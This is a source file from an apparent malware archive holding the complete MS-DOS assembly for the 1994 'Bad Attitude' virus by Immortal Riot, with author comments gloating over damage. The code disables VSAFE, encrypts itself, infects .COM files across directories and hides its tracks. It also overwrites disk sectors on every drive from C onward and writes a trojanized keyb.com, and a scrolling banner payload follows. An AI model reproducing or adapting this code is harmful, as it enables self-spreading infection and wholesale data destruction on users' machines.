MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.badattit.asm
2021-01-12 17:31:39 -06:00

412 lines
8.3 KiB
NASM
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

; -Bad Attitude-
; "Created by Immortal Riot's destructive development team"
; (c) '94 The Unforgiven/Immortal Riot
;
; "If I don't have bad attitude, this virus is harmless"
;
; Notes:
; F-Prot, Scan, Tbav, Findviru can't find shits of this virus.
;
; Disclaimer:
; If this virus damages you, it's a pleasure, but not the fault
; of the author. If you want to sue me, it's your loss.
;
; Dedication:
; I dedicate this virus to all virus writers worldwide!
.MODEL TINY
.CODE
ORG 100h
Virus_start:
xchg ax,ax
xchg ax,ax ; Take down VSAFE from memory!
mov ax,0fa01h
mov dx,5945h
int 16h
call get_delta_offset
real_start:
Get_delta_offset: ; Get delta offset
pop bp
sub bp, offset get_delta_offset
Call_en_de_crypt:
mov ax,bp
add ax,11Ah
push ax
jmp short en_de_crypt ; First, decrypt the virus
jmp short real_code_start ; and then, continue!
encryption_value dw 0 ; Random value for each infection!
Write_virus:
call en_de_crypt ; Encrypt the virus
mov ah,40h
mov cx, offset virus_end-100h
lea dx, [bp+100h]
int 21h
call en_de_crypt ; Decrypt the virus again
ret
En_de_crypt:
mov ax,word ptr [bp+encryption_value]
lea si,[bp+real_code_start]
mov cx,(virus_end-real_code_start+1)/2
Xor_LoopY:
xor word ptr [si],ax
inc si
inc si
Loop Xor_LoopY
ret
Real_code_start:
mov ah,2ch ; Get Time
int 21h
cmp dl,0 ; 1%
jne Another_Percent
call Create_file
Another_Percent:
cmp dl,1 ; another %
jne not_this_time ; Naaaaaaah
mov ah,09h ; Print the virus name
lea dx,[bp+virus]
int 21h
Trash_sucker: ; Overwrite all sectors on all drives!
mov al,2h ; on drive C - Z
Drive:
mov cx,1
lea bx,virus
cwd
Next_Sector:
int 26h
inc dx
jnc next_sector
inc al
jmp short drive
Not_this_time:
cld
Set_Dta: ; Set the dta
mov ah,1ah
lea dx,[bp+virus_end]
int 21h
Buffer_Xfer: ; Restore the beginning
lea si,[bp+first_bytes]
lea di,[bp+@buf]
mov cx,2
rep movsw
mov di,3 ; Infection-counter
Get_drive: ; Get drive from where we're
mov ah,19h ; executed from
int 21h
cmp al,2
jae Get_Dir ; A: or B:, if so, don't infect
jmp restore_start ; other programs! Just return normally!
Get_dir: ; Get directory from we're executed
mov ah,47h ; from!
xor dl,dl
lea si,[bp+dirbuf+1]
int 21h
Find_First: ; Find first file
mov cx,111b
lea dx,[bp+filemask]
mov ah,4eh
_4fh: ; When called ah=4fh
int 21h
jnc clear_file_attribs ; We did find a file!
chdir: ; We didn't find a file,
cmp byte ptr [bp+DOSflag],1
jne dot_dott
jmp no_more_files
dot_dott:
mov ah,3bh ; so we try in another dir!
lea dx,[bp+offset dot_dot]
int 21h
jnc find_first
mov ah,3bh ; We try to infect files in
lea dx,[bp+offset DOS] ; \DOS
int 21h
inc byte ptr [bp+dosflag]
jnc find_first
jmp no_more_files
Clear_file_attribs: ; Clear file attribs
mov ax,4301h
sub cx,cx
lea dx,[bp+virus_end+1eh]
int 21h
Open_file: ; Open the file in read/write mode!
mov ax,3d02h
int 21h
xchg ax,bx
Read_file: ; Red the first four bytes of the file
mov ah,3fh
mov cx,4
lea dx,[bp+first_bytes]
int 21h
Check_already_infected: ; and check if it's already infected
mov si,dx
lea si,[bp+first_bytes]
cmp word ptr [si],0e990h
je already_infected
cmp word ptr [si],5a4dh ; or an EXE file?
je already_infected
cmp word ptr [si],4d5ah ; or an EXE file?
je already_infected
mov ax,word ptr [bp+virus_end+1ah] ; or smaller than 400 bytes?
cmp ax,400
jb already_infected
cmp ax,64000 ; or bigger than 64000 bytes?
ja already_infected ; if so, don't infect <20>m!
Move_file_pointer_2_EOF:
call F_Ptr ; Move file-pointer to end of file
sub ax,4 ; take the last four bytes
Fill_1st_buf:
mov word ptr [bp+Istbuf],0e990h ; Fill the four bytes
mov word ptr [bp+Istbuf+2],ax ; with our own jmp-constrution!
_TopOfFile: ; Move file-pointer to
mov ax,4200h ; the beginning of file!
int 21h
Write_first4: ; Write our own jump instruction
mov ah,40h
mov cx,4
lea dx,[bp+Istbuf]
int 21h
_EOF: ; Move to end of file again
call F_Ptr
Get_random: ; Get a random value
mov ah,2ch
int 21h
add dl, dh
jz get_random
mov word ptr [bp+encryption_value],dx ; put it as the encryption value
call write_virus ; infect the file
jmp short restore_time_date ; Then cover our tracks!
Already_infected:
inc di
Restore_Time_Date: ; Restore the infected file time
lea si,[bp+virus_end+16h] ; and date stamps
mov cx,word ptr [si]
mov dx,word ptr [si+2]
mov ax,5701h
int 21h
Close_file: ; Close the file!
mov ah,3eh
int 21h
Set_old_attrib: ; Set back old attribs!
mov ax,4301h
xor ch,ch
mov cl,byte ptr [bp+virus_end+15h]
lea dx,[bp+virus_end+1eh]
int 21h
Enough_files: ; Have we infected
dec di ; 3 files this run?
cmp di,0
je no_more_files
mov ah,4fh ; No, then, search for the next file!
jmp _4fh
No_more_files: ; We've infected enough!
Restore_start:
lea si,[bp+@buf]
mov di,100h
movsw
movsw
Restore_dir: ; Restore the directory to
lea dx,[bp+dirbuf] ; from where we were
mov ah,3bh ; executed from!
int 21h
Exit_proc: ; and then return to the
mov bx,100h ; real-file!
push bx
xor ax,ax
retn
F_Ptr: ; Move the file-pointer to end of
mov ax,4202h ; file! (used twice!)
xor cx, cx
xor dx, dx
int 21h
ret
Create_file: ; Create a new \dos\keyb.com
Mov ah,3ch
mov cx,0
lea dx,[bp+filename]
int 21h
Write_Da_File:
xchg ax,bx
mov ah,64d
mov cx,len
lea dx,[bp+scroll] ; Write new content in the file
int 21h
Close_Da_File: ; Close the trojanized file
mov ah,3eh
int 21h
ret ; and continue..
scroll db "<22><>$<0F><03>R<><52><02><10>O<00><00>",1ah," <09>"
scrol1 db " <20>Q<>8",0ffh,"<22><>Y<EFBFBD><02>z<01>!<21>{<01>!<21>|<01>!<21>}<01>!<21>~<01>!<21><01>!<21><16><01>!<21><16><01>!<21> <20>!<21><16><01>!<21><16><01>!<21><16><01>!<21><16><01>!<21> <20>!O<><4F>ImmortalRiot "
len equ $-scroll
virus db '[BAD ATTITUDE!]$'
copy db "(c) '94 The Unforgiven/Immortal Riot"
Filemask db '*.COM',0
Dot_dot db '..',0
dos db '\dos',0
filename db '\dos\keyb.com',0
Buffers:
First_bytes db 90h,90h,50h,0c3h ; Our own little jmp constrution!
@buf db 4 dup(0) ; Empty space to be
Istbuf db 4 dup(0) ; filled with instructions
DIRBUF db "\"
Junkie:
db 64 DUP(0)
dosflag db 0
virus_end:
end virus_start
; ------------------------------------------------------------------------------
; Here is the nice pay-load (read:scroll) in the Bad Attitude virus.
.model tiny
.code
org 100h
Ssscroll:
mov al,dl
and al,15
mov ah,3
int 10h
push dx
mov dh,al
xor dl,dl
mov ah,2
int 10h
mov di,79
mov cx,1
arrow:
mov ax,91Ah
mov bl,10
int 10h
DELAY:
push cx
mov cx,-200
rep lodsb
pop cx
mov ah,2
mov dl, I
int 21h
mov dl, M
int 21h
mov dl, M2
int 21h
mov dl, O
int 21h
mov dl, R
int 21h
mov dl, T
int 21h
mov dl, A
int 21h
mov dl, L
int 21h
Space:
mov dl, ' '
int 21h
mov dl, R2
int 21h
mov dl, I2
int 21h
mov dl, O2
int 21h
mov dl, T2
int 21h
mov dl,' '
int 21h
dec di
jmp arrow ; Loop until a ctrl+break is pressed!
heap:
I db 'I' ; Immortal Riot
M db 'm'
M2 db 'm'
o db 'o'
R db 'r'
T db 't'
A db 'a'
L db 'l'
R2 db 'R'
I2 db 'i'
O2 DB 'o'
T2 DB 't' ; Is here to stay!
a13 db ' '
end Ssscroll